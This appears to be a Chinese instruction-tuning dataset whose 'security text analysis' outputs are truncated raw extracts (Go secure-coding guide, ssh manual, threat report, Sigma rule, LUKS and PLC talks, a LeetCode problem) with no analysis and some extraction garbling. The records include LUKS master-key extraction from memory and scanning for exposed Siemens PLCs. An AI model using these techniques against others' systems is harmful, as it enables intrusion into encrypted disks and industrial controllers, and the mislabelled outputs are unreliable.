{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n英文地址 翻译blood_zer0Lingfighting 如果翻译的有问题联系我(Lzero2012)匆忙翻译肯定会有很多错误欢迎大家一起讨论Go语言安全能力力建设 Go语言-Web应用程序安全编码实践是为了了给任何使用Go进行行编程与Web开发的人员提供指导 这本书是Checkmarx安全研究团队共同努力力的结晶它遵循OWASP安全编码实践快速参考指南 这本书主要的目的是为了了帮助开发人员避免常见错误同时通过\"实践方法\"学习编程语言心得本书提供了了关于\"如何安全执行行\"详细信息展示了了在 开发过程中可能出现的安全问题 Checkmarx是一家应用程序软件安全公司公司使命是为企业组织提供应用程序安全测试产品与服务提高开发人员交付安全应用程序拥有1000 家客服包括全球十大软件供应商中的物价美国顶级银行行中的四家以及许多财富500强和政府机构包括SAP三星和Salesforce.com 关于Checkmarx的更更多信息可以访问checkmarx.com或者关注我们的twitter@checkmarx \"安全编程实践快速参考指南\"是OWASP开源Web安全项目它是一种\"技术无关的通用软件安全编程实践集采用全面的列列表格式可以集成到开发 生命周期中\" OWASP本身是\"一个开放的社区致力力于使组织能够构思开发获取操作和维护可信任的应用程序所有的OWASP工具文档论坛和章节都 是免费的并且对任何有兴趣提高应用程序安全性的人开放\" 在Web应用程序安全性中如果未对用户输入及相关数据进行行验证则会存在安全风险我们通过\"输入验证\"与\"输出处理理\"技术来解决这些问题根据 服务器器的功能应在应用程序的每个层中执行行这些验证重要的一点是所有数据验证程序必须在可信系统上即在服务器器上完成 如\"OWASP SCP快速参考指南\"中所述有16个要点涵盖了了开发人员在处理理输入验证时应注意的问题在开发应用程序时缺乏对这些安全风险的考虑 是注入\"OWASP Top 10\"中排名第一的主要原因之一 用户交互是Web应用程序当前开发范例例的主要内容随着Web应用程序内容和可能性越来越丰富用户交互和提交的用户数据也会增加正是在这种 背景下输入验证起着重要作用 当应用程序处理理用户数据时默认情况下提交的数据必须被视为不不安全并且只有在进行行了了适当的安全检查后才能接受还必须将数据源标识为受信 任或不不受信任并且在不不受信任的源的情况下必须进行行验证检查 在验证检查中根据一组条件检查用户输入以保证用户确实输入了了预期数据 重要信息如果验证失败则必须拒绝输入 这不不仅从安全角度而且从数据一致性和完整性的角度来看很重要因为数据通常用于各种系统和应用程序 本文列列出了了开发人员在Go中开发Web应用程序时应注意的安全风险 Go语言安全编码规范-翻译 介绍 关于Checkmarx 关于OWASP安全编程实践 输入验证 验证 用户交互 bloodzer0&Lingfighting 允许用户输入的应用程序的任何部分都存在潜在的安全风险 问题不不仅可能来自寻求危害应用程序的方法也可能来自人为错误导致的错误输入 统计上大多数无效数据情况通常是由人为错误引起的 在Go中有几种方法可以防止此类问题 Go具有本机库其中包括有助于确保不不会发生此类错误的方法 在处理理字符串串时我们可以使用类似以下示例例的包 strconv 包处理理到其他数据类型的字符串串转换 Atoi ParseBool ParseFloat ParseInt strings 包包含处理理字符串串及其属性的所有函数 Trim ToLower ToTitle regexp 包支持正则表达式以适应自定义格式 utf8 包实现函数和常量量以支持以UTF-8编码的文本它包括在runes和utf-8字节序列列之间转换的函数 Valid验证UTF-8编码 ValidRune验证UTF-8编码 ValidString验证UTF-8编码 EncodeRuneUTF-8编码 DecodeLastRuneUTF-8解码 DecodeLastRuneInStringUTF-8解码 注意Form被go视为字符串串值的映射 确保数据有效性的其他技术包括 白名单-尽可能根据允许的字符白名单验证输入请参见Validation - Strip tags 边界检查-应验证数据和数字长度 字符转义-用于特殊字符如独立引号 数字验证-如果输入是数字 检查空字节-%00 检查新行行字符-%0d%0a\\r\\n 检查路路径更更改字符-../或\\.. 检查扩展的UTF-8-检查特殊字符的可选表示形式 注意确保HTTP请求和响应头只包含ASCII字符 存在处理理go中安全性的第三方软件包 Gorilla是Web应用程序安全性最常用的包之一它支持websocketsco", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nssh === openssh套件中的客户端连接工具 ## 补充说明 **ssh命令** 是openssh套件中的客户端连接工具可以给予ssh加密协议实现安全的远程登录服务器 ### 语法 ```shell ssh(选项)(参数) ``` ### 选项 ```shell -1强制使用ssh协议版本1 -2强制使用ssh协议版本2 -4强制使用IPv4地址 -6强制使用IPv6地址 -A开启认证代理连接转发功能 -a关闭认证代理连接转发功能 -b使用本机指定地址作为对应连接的源ip地址 -C请求压缩所有数据 -F指定ssh指令的配置文件 -f后台执行ssh指令 -g允许远程主机连接主机的转发端口 -i指定身份(私钥)文件 -l指定连接远程服务器登录用户名 -N不执行远程指令 -o指定配置选项 -p指定远程服务器上的端口 -q静默模式 -X开启X11转发功能 -x关闭X11转发功能 -y开启信任X11转发功能 ``` ### 参数 * 远程主机指定要连接的远程ssh服务器 * 指令要在远程ssh服务器上执行的指令 ### 实例 ```shell # ssh 用户名@远程服务器地址 ssh user1@172.24.210.101 # 指定端口 ssh -p 2211 root@140.206.185.170 # ssh 大家族 ssh -p 22 user@ip # 默认用户名为当前用户名默认端口为 22 ssh-keygen # 为当前用户生成 ssh 公钥 + 私钥 ssh-keygen -f keyfile -i -m key_format -e -m key_format # key_format: RFC4716/SSH2(default) PKCS8 PEM ssh-copy-id user@ip:port # 将当前用户的公钥复制到需要 ssh 的服务器的 ~/.ssh/authorized_keys之后可以免密登录 ``` 连接远程服务器 ```shell ssh username@remote_host ``` 连接远程服务器并指定端口 ```shell ssh -p port username@remote_host ``` 使用密钥文件连接远程服务器 ```shell ssh -i path/to/private_key username@remote_host ``` 在本地执行远程命令 ```shell ssh username@remote_host \"command\" ``` 在本地复制文件到远程服务器 ```shell scp path/to/local_file username@remote_host:/path/to/remote_directory ``` 在远程服务器复制文件到本地 ```shell scp username@remote_host:/path/to/remote_file path/to/local_directory ``` 在本地端口转发到远程服务器 ```shell ssh -L local_port:remote_host:remote_port username@remote_host ``` 在远程服务器端口转发到本地 ```shell ssh -R remote_port:local_host:local_port username@remote_host ``` ### 背后故事 > 英文Tatu Ylonen > 编译Linux中国/kenxx > 来源https://linux.cn/article-8476-1.html 为什么 SSH安全终端的端口号是 22 呢这不是一个巧合这其中有个我Tatu YlonenSSH 协议的设计者未曾诉说的故事 #### 将 SSH 协议端口号设为 22 的故事 1995 年春我编写了 SSH 协议的最初版本那时候 telnet 和 FTP 正被广泛使用 当时我设计 SSH 协议想着是为了替代 telnet端口 23和 ftp端口21两个协议的而端口 22 是空闲的我想当然地就选择了夹在 telnet 和 ftp 的端口中间的数字我觉得端口号虽然是个小事但似乎又存在着某种信念但我到底要怎么拿到那个端口号呢我未曾拥有过任何一个端口号但我却认识几个拥有端口号的人 在那时取得端口号的事情其实说来挺简单的毕竟当时的因特网Internet并不是很大是因特网爆炸的早期端口号分配的活儿是 IANAInternet Assigned Numbers Authority互联网数字分配机构干的在那时这机构可相当于是因特网先驱 [Jon Postel](https://en.wikipedia.org/wiki/Jon_Postel) 和", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCHINESE STATE-SPONSORED GROUP REDDELTA TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS CTA-CN-2020-0728 By Insikt Group  CYBER THREAT ANALYSIS CHINA Recorded Future | www.recordedfuture.com CTA-CN-2020-0728 1 Insikt Group researchers used proprietary Recorded Future Network Traffic Analysis and RAT controller detections, along with common analytical techniques, to identify and profile a cyberespionage campaign attributed to a suspected Chinese state-sponsored threat activity group, which we are tracking as RedDelta. Data sources include the Recorded Future Platform, Farsight Securitys DNSDB, SecurityTrails, VirusTotal, Shodan, BinaryEdge, and common OSINT techniques. This report will be of greatest interest to network defenders of private sector, public sector, and non-governmental organizations with a presence in Asia, as well as those interested in Chinese geopolitics. Executive Summary From early May 2020, The Vatican and the Catholic Diocese of Hong Kong were among several Catholic Church-related organizations that were targeted by RedDelta, a Chinese-state sponsored threat activity group tracked by Insikt Group. This series of suspected network intrusions also targeted the Hong Kong Study Mission to China and the Pontifical Institute for Foreign Missions (PIME), Italy. These organizations have not been publicly reported as targets of Chinese threat activity groups prior to this campaign. These network intrusions occured ahead of the anticipated September 2020 renewal of the landmark 2018 China-Vatican provisional agreement, a deal which reportedly resulted in the Chinese Communist Party (CCP) gaining more control and oversight over the countrys historically persecuted underground Catholic community. In addition to the Holy See itself, another likely target of the campaign includes the current head of the Hong Kong Study Mission to China, whose predecessor was considered to have played a vital role in the 2018 agreement. The suspected intrusion into the Vatican w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 63. 股票的最大利润 ## 题目链接 [Leetcode121. Best Time to Buy and Sell Stock ](https://leetcode.com/problems/best-time-to-buy-and-sell-stock/description/) ## 题目描述 可以有一次买入和一次卖出买入必须在前求最大收益 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/42661013-750f-420b-b3c1-437e9a11fb65.png\" width=\"220px\"> </div><br> ## 解题思路 使用贪心策略假设第 i 轮进行卖出操作买入操作价格应该在 i 之前并且价格最低因此在遍历数组时记录当前最低的买入价格并且尝试将每个位置都作为卖出价格取收益最大的即可 ```java public int maxProfit(int[] prices) { if (prices == null || prices.length == 0) return 0; int soFarMin = prices[0]; int maxProfit = 0; for (int i = 1; i < prices.length; i++) { soFarMin = Math.min(soFarMin, prices[i]); maxProfit = Math.max(maxProfit, prices[i] - soFarMin); } return maxProfit; } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n主办方 赞助商 双传统物流安全成长分享 张天宇 目录 01 观现状 02 看成果 03 搞事情 04 干正事 安全行业现状 金融党政公检法 区块链互联网 文化食品等 传统物流制造医疗 业务型 监管型 低迷型 传统型 监管强 投入高 上汽安吉物流 汽车及装备 供应链 解决方案 社会化快运 智能与信息 国际物流 供应链金融  整车物流 装备物流 航运物流 口岸物流 零部件物流 非汽车物流 零部件预装 双传统面临的困局 1业务没有安全压力 无驱动无监管 2领导层不关心安全 无投入没资源 3国企老员工 不支持不配合别麻烦没好处免谈 目录 观现状 02 看成果 03 搞事情 04 干正事 01 上汽集团 上汽大众 上汽通用 安吉物流 信息公司 IT部 信息安全 组 信息安全 部 安全部发展历程 IT部下属安全组 与IT平级的信息安全部门 集团安全部门 2020年 2019年 2018年 安全部-职责 1集团安全方针标准监督 2信息安全建设(总部分子公司) 3上汽安吉物流SRC内部外部 4科技公司输出产品服务 5外部影响力安全生态建设 目录 观现状 02 看成果 03 搞事情 04 干正事 01 跟业务搞事情-应急响应 黑客 正常用户 通过Web Socket代理打通到内网的隐秘隧道 12月25日安装 HIDS入侵检测 1月4号全盘检查 发现后门程序 XXXX内网 官网Web服务器 其他服务器 后门创建日期为20172018年2年时间未能发现 跟业务搞事情-事件分析 圆通个人信息泄露事件分析v4.1 跟领导搞事情 2将信息安全加入生产安全管理委员会范畴 定期组织工作汇报推动安全建设 1组织最高领导层学习培训企业负责人信 息安全手册 中华人民共和国网络安全法 信息安全等级保护管理办法 中华人民共和国数据安全法草案  中华人民共和国民法典 个人信息保护法草案 App违法违规收集使用个人信息行为认定方法 上汽集团所属企业实施网络安全管理考核评价方案  信息安全法律法规相继出台建设信息安全体系不 仅能够提升企业整体信息安全防护强度还避免了企业 法人承担网络安全相关法律法规处罚的风险 法律法规: 没有网络安全就没有国家安全 网络安全和信息化 是一体之两翼驱动之双轮 必须统一谋划 统一部署统一推进统一实施 习近平 违法行为 处罚类型 责令整改 警告 罚款 停业整顿 吊销执照 刑事处罚 未实施等保 违法收集使用篡改出售公民信 息 未妥善保护公民信息 未及时阻止违规信息发布 未消除及保存记录 未制定安全应急预案 违法处罚风险 1已举办两届信息安全冲顶大会提高员 工信息安全意识和技能  吸引全国50+家分子公司参与  平台访问+公众号文章阅读1.7万+次  活动文章转发阅读5000+次 2创办公众号上汽安吉安全应急响应中心 持续输出信息安全文化和技能  已发布60+篇安全技术意识等文章  覆盖1400+名关注用户 跟同事搞事情-安全冲顶大会 黑客体验区 泄露数据查询 USB安全充电模块 隐藏摄像头查找 入侵实战模拟 网站钓鱼演示 wifi钓鱼演示 物联网安全演示  跟同事搞事情-安全冲顶大会 跟分子公司搞事情-安全标准  对各单位进行IT资产的评估制定基础安全技术服务的建设方案 跟分子公司搞事情-基础安全Saas方案 SAAS服务平台 应用防火墙 入侵防御系统 终端安全PC主机 基础架构漏洞管理系统 应用安全漏洞管理系统 目录 观现状 02 看成果 03 搞事情 04 干正事 01 1信息安全管理体系 2产品&服务 PPDR安全服务体系为企业提供数字化全生命周期的安全保障 Policy 策略  安全体系建设  等级保护咨询 Detection 检测  渗透测试服务  SRC平台 Protection 保护  基础安全SaaS服务平台  数据安全  业务安全 Response 响应  应急响应服务 四大服务 四大平台 3.1基础安全SaaS服务平台--产品架构 3.2基础安全SaaS服务平台安全大屏 4.1SDL-安全开发流程 需求分析 软件开发 发布部署 架构设计 软件测试 项 目 建 立 威胁建模 黑盒测试 部署前 流程化 安全活动 工程阶段 活动依据 预计 人日 评估结果输出 1 方案制定 准备阶段 1客户明确安全需求 2根据场景安全评估 无 安全解决方案 2 需求分析 需求分析阶 段 1根据场景需求分析 2基于安全售前方案特殊安全需求分析 1 安全需求分析 3 安全架构评审 设计阶段 安全架构评审规则 1 安全架构审核报告 4 应用安全测试 测试阶段 安全类编码指南 5 应用安全测试报告 5 主机安全检测 部署阶段 基线标准 1 主机安全检测报告 含基线检测漏洞检测 6 安全方案实施 安全架构设计框架 1 安全实施结果 72个已完成项目 4.2SDL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Trend Micro CTF 2018 Quals Team: nazywam, pwn.m0d3, shalom, sasza, akrasuski1, rodbert ### Table of contents * [Java pwn (misc)](misc_deserializer) * [Ocean of sockets (forensics)](for_ocean) * [Deep dive (forensics)](for_dive) * [Constellation (misc)](misc_constellation) * [RSA (crypto)](crypto_rsa) * [ACME (crypto)](crypto_acme) * [Feistel (crypto)](crypto_feistel) * [Parsletongue (re)](re_parsle)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking E.S.P. Hacking E.S.P. Disclaimer Disclaimer The views and opinions expressed in this The views and opinions expressed in this presentation are solely those of the presentation are solely those of the speakers and do not necessarily reflect speakers and do not necessarily reflect opinions of their employers, Defcon, the opinions of their employers, Defcon, the Riviera, residents of Las Vegas, residents Riviera, residents of Las Vegas, residents of Nevada, anyone in the United States or of Nevada, anyone in the United States or on the Planet Earth. Nothing we are saying on the Planet Earth. Nothing we are saying should be construed as legal advice. Don't should be construed as legal advice. Don't rely on anything that we say, do your own rely on anything that we say, do your own research. research. Who We Are! Who We Are! Joe Cicero is currently a Network Specialist Instructor for Joe Cicero is currently a Network Specialist Instructor for Northeast Wisconsin Technical College, he specializes in Northeast Wisconsin Technical College, he specializes in teaching Linux, Network Security, and Computer Forensics teaching Linux, Network Security, and Computer Forensics Courses. Joe has had positions covering every aspect of Courses. Joe has had positions covering every aspect of computers including: Help Desk Support, Technician, computers including: Help Desk Support, Technician, Programmer, Network Administrator, Directory of Technology, Programmer, Network Administrator, Directory of Technology, Columnist and of course Instructor. He is most passionate Columnist and of course Instructor. He is most passionate about teaching and enjoys having the time to \"tinker\" with all about teaching and enjoys having the time to \"tinker\" with all types of technology. types of technology. Michael Vieau is a independent security researcher located in Michael Vieau is a independent security researcher located in United States where he conducts security assessments & United States", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1078-003-win-可疑的失败登录行为 ## 来自ATT&CK的描述 攻击者可能会使用凭据访问技术窃取特定用户或服务账号的凭据或者在早期的侦察过程通过社会工程捕获凭据以获得首次访问权限 攻击者可以使用三种账号默认账号本地账号和域账号默认账号是操作系统的内置账号例如Windows系统上的访客或管理员账号或者其他类型系统软件或设备上的默认工厂/提供商账号本地账号是组织配置给用户远程支持或服务的账号或单个系统/服务的管理账号域账号是AD-DS活动目录域服务管理的账号其访问和权限在域内不同系统和服务之间配置域账号可以涵盖用户管理员和服务 攻击者可以使用窃取的凭据绕过网络内系统上各种资源的访问控制甚至可用于对远程系统和外部可用服务如VPNOutlook Web Access和远程桌面的持久访问攻击者还可能通过窃取的凭据获得特定系统的更多权限或网络受限区域的访问权限攻击者可以选择不将恶意软件或工具与这些凭据提供的合法访问结合使用这样就更难检测到它们的存在 默认账号并不限于客户端机器上的访客和管理员它们还包括为设备如网络设备和计算机应用预设的账号无论这些设备是内部的开源的还是COTS如果设备预设了用户名和密码组合而且安装后不更改将会对组织构成严重威胁因为它们很容易成为攻击者的目标同理攻击者也可能会利用公开披露的私钥或盗取的私钥通过远程服务合法地连接到远程环境 我们需要关注跨系统网络的账号访问凭据和权限的重叠因为攻击者也许能够跨账号和系统切换以获得较高的访问级别域或企业管理员从而绕过企业内设置的访问控制 ## 测试案例 windows账户登录失败 ## 检测日志 windows 安全日志 ## 测试复现 场景较简单请自行测试 ## 测试留痕 windows安全事件IDwin7 / win2008+ ## 检测规则/思路 ### sigma规则 ```yml title: 帐户篡改-可疑的失败登录原因 description: 此方法对失败的登录使用不常见的错误代码来确定可疑活动并篡改已禁用或受某种方式限制的帐户 author: 12306Br0(测试+翻译) date: 2020/06/09 references: - https://twitter.com/SBousseaden/status/1101431884540710913 tags: - attack.persistence - attack.privilege_escalation - attack.t1078 logsource: product: windows service: security detection: selection: EventID: - 4625 #普通账户登录失败 - 4776 #域账户登录失败 Status: - '0xC0000072' # 用户登录到帐户已被管理员禁用 - '0xC000006F' # 用户在授权时间之外登录 - '0xC0000070' # 用户从未经授权的工作站登录 - '0xC0000413' # 登录失败您登录的计算机受到身份验证防火墙的保护 指定的帐户不允许对计算机进行身份验证 - '0xC000018C' # 登录请求失败因为主域和可信域之间的信任关系失败 - '0xC000015B' # 用户尚未在此计算机上被授予请求的登录类型也称为登录权限 condition: selection falsepositives: - 使用禁用帐户的用户 level: high ``` 注意此规则主要是针对用户账户登录失败行为状态码进行分析 ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1078-003 <https://attack.mitre.org/techniques/T1078/003>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 luks 全盘加密的个通解密法--从内存中提 取LUKS MASTER KEY 前 破解LUKS全盘加密 从内存镜像中提取MASTER KEY 第步 判断加密算法 第步 DUMP 包含秘钥的内存 第三步 从内存寻找aes key 第四步 解密分区 第五步 解密其他分区 作者:橙酱 之前的章中提到了种有启动分区的情况 磁盘主引导->引导分区->引导内核->系统启动->解密挂载分区 (个引导分区 +个主分区) 遇到这种情况就可以通过简单的提取件系统中的秘钥解决. 但是运不好还会遇到两种更变态的情况 磁盘主引导->引导分区->引导内核->引导内核中解密挂载分区->系统启动->解密挂载分区(只有个引 导分区) 磁盘主引导->磁盘引导程序->解密分区->引导->系统启动->解密其他分区 (个明分区都没有) 前 2 这时,通常只能通过逆向引导程序来提取内核镜像.最终拿到镜像中的秘钥件. 这个过程分的繁琐. 在没有符号表的情况逆向魔改过的linux引导内核也常困难. 那么有没有个简单的法解决这个问题呢? luks 解密进磁盘后硬盘上的数据实际仍然是加密的. 为了可以实时读写加密分区内的数据,加解密使的秘钥定存在于内存之中. 破解LUKS全盘加密 钱镜洁 魏鹏 沈达. LUKS加密卷的离线解密技术分析[J]. 信息络安 全, 2014, 14(9): 217-219. 3 挂载硬盘 使cryptsetup luksDump 判断分区使的加密算法 本使的是 AES 256 加密 (默认加密算法) 在虚拟机第个分区完成解密后,dump虚拟机完整内存 (快照 暂停 命令 均可) 使具从内存寻找aes key https://sourceforge.net/projects/findaes/ https://github.com/mmozeiko/aes-finder https://www.kali.org/tools/aeskeyfind/ 从内存镜像中提取MASTER KEY 第步 判断加密算法 第步 DUMP 包含秘钥的内存 第三步 从内存寻找aes key 4 选择对应度的key hex转成raw件作为key 第四步 解密分区 5 ryptsetup luksOpen 加密的分区 --master-key-file key件 挂载名 依次尝试各个分区和各个秘钥的组合 错误返回即为解密成功. 挂载解密后的分区,在解密后寻找动挂载件 /etc/crypttab 得到其他秘钥位置. 之后的步骤就按照之前的章操作 第五步 解密其他分区", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .\\\" Don't change the first line, it tells man that we need tbl. .\\\" This man page is Copyright (C) 1999 Andi Kleen . .\\\" and copyright (c) 1999 Matthew Wilcox. .\\\" Permission is granted to distribute possibly modified copies .\\\" of this page provided the header is included verbatim, .\\\" and in case of nontrivial modification author and date .\\\" of the modification is added to the header. .TH SOCKET 7 \"7 May 1999\" \"Linux Man Page\" \"Linux Programmer's Manual\" .SH NAME socket \\- Linux 套接字 .SH 总览 .B #include <sys/socket.h> .br .IB mysocket \" = socket(int \" socket_family \", int \" socket_type \", int \" protocol ); .SH 描述 本手册页介绍了 Linux 套接字的用户接口. 这个 BSD 兼容套接字是介于用 户进程与内核网络协议栈之间的统一接口, 各协议模块属于不同的 .I 协议族 ,如 .BR PF_INET \", \" PF_IPX \", \" PF_PACKET 和 .I 套接字类型 ,如 .B 字节流SOCK_STREAM 或 .BR 数据报SOCK_DGRAM. 关于协议族和套接字类型请参考 .BR socket (2) \".\" .SH 套接层函数 用户通过这些套接字函数发送和接收包, 以及其他套接字操作. 详细说明参看他们各自的手册页. .BR socket (2) 创建套接字 .PP .BR connect (2) 与远程套接字地址建立连接 .PP .BR bind (2) 把套接字和一个本地套接字地址绑定在一起为套接字分配一个本地协议地址 .PP .BR listen (2) 通知套接字接受新的连接 .PP .BR accept (2) 为新的已完成连接获得新的描述字 .PP .BR socketpair (2) 返回两个连接的匿名套接字仅在某些本地族中才有实现,如 .BR PF_UNIX \"\" .PP .BR send (2), .PP .BR sendto (2), 和 .BR sendmsg (2) 通过套接字发送数据而 .BR recv (2), .BR recvfrom (2), .BR recvmsg (2) 从套接字接收数据. .BR poll (2) 和 .PP .BR select (2) 等待数据到来或准备好接收数据. 除此之外, 标准 I/O 操作如 .BR write (2), .BR writev (2), .BR sendfile (2), .BR read (2), 和 .BR readv (2) 也可用来读入接收和写出发送数据. .PP .BR getsockname (2) 用于获得本地套接字地址 .PP .BR getpeername (2) 用于获得远端套接字地址. .BR getsockopt (2) 和 .BR setsockopt (2) 用于设置或取得套接字或协议选项. .BR ioctl (2) 也可以用来设置或读取一些其他选项. .PP .BR close (2) 关闭套接字. .BR shutdown (2) 关闭全双工套接字连接的一部分. .PP 套接字不支持搜索也不支持调用 .BR pread (2) 或 .BR pwrite (2) 进行非 0 位置的操作. 可以用 .BR fcntl (2). 设置 .B O_NONBLOCK 标志来实现对套接字的非阻塞 I/O 操作 .B O_NONBLOCK 是从 accept 继承来的然后原来所有会阻塞的操作会返回 .BR EAGAIN . .BR connect (2) 在此情况下返回 .B EINPROGRESS 错误. 用户可以通过 .BR poll (2) 或者 .BR select (2) 等待各种事件. .PP .TS tab(:) allbox; c s s l l l. I/O 事件 事件:轮询标志:发生事件 读:POLLIN:T{ 新数据到达. T} 读:POLLIN:T{ (对面向连接的套", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploit PLC on the internet Z-0ne 概述 什么是PLC 为什么会联网 PLC  Programmable Logic Controller  电源  CPU  存储  I/O  网络模块 PLC功能  PLC功能  顺序控制  逻辑控制  PLC应用  自动化控制  过程控制 其他  PLC内核  Codesys  ProConos  底层操作系统  Linux  Vxworks  WinCE  通信协议  通用  Modbus  私有  S7  Omron FINS PLC通信  串行  RS232/485  专用  MPI  以太网  TCP/IP  UDP 网络武器的目标  Stuxnet作为网络武器其最终的目标也是西 门子PLC  劫持通信  注入自己的逻辑程序 联网的隐患(1)  PLC暴露在互联网是比SCADA更大的安全隐 患  未授权访问  设备的用户等级保护缺失  通信协议的脆弱性 联网的隐患(2)  PLC暴露在互联网是比SCADA更大的安全隐 患  控制流程工艺  位于更底层  可能为关键基础设施 P L P L P L P L APPLICATION MES应用 ERP 信息层 管理层 控制层 设备层 联网的趋势  远程数据通信/远程维护催生了联网的需求  方便快捷  减少了现场运维的成本  统一管理 联网的解决方案(1) 联网的解决方案(2) 联网的解决方案(2) PLC ON THE INTERNET 西门子PLC全球统计报告 西门子PLC公网蜜罐统计 西门子S7协议 蜜罐应用案例 联网的风险案例 S7-1200硬件形态 S7-300硬件形态 西门子PLC CPU模块全球统计报告(1)  使用S7协议(TCP/102)对互联网进行扫描探测  http://www.zoomeye.org/search?q=port%3A102  https://www.shodan.io/search?query=Module+po rt%3A102  全球数据 (能成功读出模块型号的数据)  ZoomEye à 1446  Shodan à 2749  Plcscan.org à 2215 西门子PLC CPU模块全球统计报告(2)  使用S7协议(TCP/102)对互联网进行扫描探测  Nmap à s7-enumerate.nse(TSAP:0102)  PG mode  Rack:0 Slot:2 西门子PLC CPU模块全球统计报告(3)  国家排行  德国 350  意大利 255  美国 179  西班牙 146  土耳其 124  波兰 113  法国 108  捷克 74  丹麦 67  奥地利 64 西门子PLC CPU模块全球统计报告(4)  模块货号排行  6ES7 214-1AG31-0XB0 145  6ES7 214-1AE30-0XB0 142  6ES7 212-1HE31-0XB0 129  6ES7 315-2AG10-0AB0 129  6ES7 151-8AB01-0AB0 121  6ES7 315-2EH14-0AB0 120  6ES7 315-2AH14-0AB0 88  6ES7 214-1BG31-0XB0 74  6ES7 314-6EH04-0AB0 74  6ES7 313-5BF03-0AB0 73 西门子PLC CPU模块全球统计报告(5)  固件版本排行  Version: 3.0.2 472  Version: 2.2.0 142  Version: 2.6.0 113  Version: 4.0.0 96  Version: 2.6.11 76  Version: 3.2.10 76  Version: 3.2.6 69  Version: 3.3.8 59  Version: 3.2.3 59  Version: 3.2.8 55 西门子PLC CP模块全球统计报告(1)  使用S7协议(TCP/102)对互联网进行扫描探测  Nmap à s7-enumerate.nse(TSAP:0100)  Rack:0 Slot:0  全球数据(能成功读出模块型号的数据)  Plcscan.org à 486 西门子PLC CP模块全球统计报告(2)  使用S7协议(TCP/102)对互联网进行扫描探测  Nmap à s7-enumerate.nse(TSAP:0100)  PG mode  Rack:0 Slot:0 西门子PLC CP模块全球统计报告(3)  国家排行  意大利 91  德国 76  西班牙 32  法国 29  瑞士 26  捷克 25  丹麦 23  美国 18  波兰 14  中国 14 西门子P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIOActive, Inc. Copyright 2014. All Rights Reserved. Hacking Traffic Control Systems (U.S, UK, Australia, France, etc.) Cesar Cerrudo @cesarcer CTO, IOActive Labs IOActive, Inc. Copyright 2014. All Rights Reserved. About Me  Hacker, vulnerability researcher, created novel exploitation techniques, dozens of vulnerabilities found (Microsoft Windows, SQL Server, Oracle, etc.).  Developed, sold exploits, and 0day vulnerabilities (7-10 years ago)  CEO of software company  CTO at IOActive labs  Live in small city in third world country, far away from everything IOActive, Inc. Copyright 2014. All Rights Reserved. Thanks  Barnaby Jack  Ruben Santamarta  Mike Davis  Mike Milvich  Susan Wheeler  Ian Amit  Robert Erbes IOActive, Inc. Copyright 2014. All Rights Reserved. How all started  Found news that London was going to implement wireless devices for traffic detection  After some research found the devices vendor name  Vendor ended up being interesting target, widely deployed  +250 customers in 45 US States and 10 countries  200,000+ Wireless sensors deployed worldwide, most of them on the US  Countries include US, United Kingdom, China, Canada, Australia, France, etc.  After reading available documentation I had strong feeling the devices were insecure IOActive, Inc. Copyright 2014. All Rights Reserved. How It All Started  Getting the devices  Social engineered the vendor  Shipped them to Puerto Rico and traveled with them back and forth to the U.S. from Argentina several times with no problems IOActive, Inc. Copyright 2014. All Rights Reserved. Devices: Wireless Sensors  Magnetometer, installs in a small hole  Rugged mechanical design, 10 year battery life  TI CC2430 RF transceiver IEEE 802.15.4 system-on-chip 2.4-GHz  TI MSP430 MCU (microcontroller) 16-bit RISC CPU , i386 Linux (probably TinyOS RTOS) IOActive, Inc. Copyright 2014. All Rights Reserved. Devices: Wireless Sensors IOActive, Inc. Copyright 2014. All Rights Reserved. Devices: Access Point  Processes, stores, and", "category": "text_analysis", "source": "security_papers"}
